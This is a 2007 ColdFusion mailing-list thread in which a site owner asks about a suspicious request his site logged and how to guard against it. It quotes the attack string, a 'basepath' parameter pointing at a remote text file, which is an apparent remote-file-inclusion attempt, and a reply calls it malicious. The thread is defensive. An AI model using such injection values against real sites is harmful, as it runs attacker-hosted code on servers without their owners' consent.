What would be the best way to guard from this? I already have the ip with a cfabort and an email notification to me. Anything else I should do?
Thanks for the help, guys. -----Original Message----- From: Dana [mailto:[EMAIL PROTECTED] Sent: Saturday, September 08, 2007 6:14 PM To: CF-Community Subject: Re: any idea what this is? uh I agree with paul. It looks to me like they are trying to do bad things to your computer ;) Here's some comments to go with that code: http://www.romsteady.net/blog/2007/07/bad-code-worse-intentions.html Dana On 9/8/07, Matthew Smith <[EMAIL PROTECTED]> wrote: > My website threw a few errors that I was emailed about. The > cgi.querystrting was > "basepath=http://usuarios.arnet.com.ar/larry123/safe.txt?";. If you go > to that url you get some code, I think it's php. > > http://usuarios.arnet.com.ar/larry123/safe.txt > > Any idea what this is and what they are trying to do? > > > > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~| Download the latest ColdFusion 8 utilities including Report Builder, plug-ins for Eclipse and Dreamweaver updates. http;//www.adobe.com/cfusion/entitlement/index.cfm?e=labs%5adobecf8%5Fbeta Archive: http://www.houseoffusion.com/groups/CF-Community/message.cfm/messageid:242090 Subscription: http://www.houseoffusion.com/groups/CF-Community/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.5
